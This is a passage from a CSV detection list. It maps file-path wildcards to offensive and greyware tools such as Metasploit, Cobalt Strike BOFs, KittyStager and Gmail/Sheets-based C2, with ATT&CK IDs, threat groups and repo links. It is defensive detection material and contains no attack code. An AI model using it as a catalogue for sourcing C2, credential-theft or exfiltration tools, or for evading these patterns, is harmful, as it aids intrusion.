TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ssh*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/G0ldenGunSec/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/GadgetToJScript.git*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*/gandcrab.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/gather/credentials*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gather/forensics*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gato/*attack.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*/GC2-sheet/*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*/gcat.git*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*/gcat.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*/geacon/*beacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/geacon_pro*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/Gemail-Hack.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*/GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/get-clipboard.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/getLegit/cdnl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/prvw*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/tsom*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/zijz*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/get-loggedon/*.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/get-shucking.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*/getST.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/get-system/getsystem.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/GetWebDAVStatus_BOF/*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*/ghidra*","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","43256","5253","2023-10-04T16:39:02Z","2019-03-01T03:27:48Z" +"*/ghostfile.aspx*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*/GhostInTheNet.git*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/GhostInTheNet.sh*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/GhostInTheNet-master*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" +"*/ghostscript/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gimmeSH.sh*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" +"*/giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com*.exe?raw=true*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/archive/refs/tags/*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.7z*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.apk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.app*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.as*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.asc*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.asp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bash*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.beacon*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bin*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.bpl*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.c*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cer*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cmd*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.com*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cpp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.crt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.cs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.csh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.dat*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.dll*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive 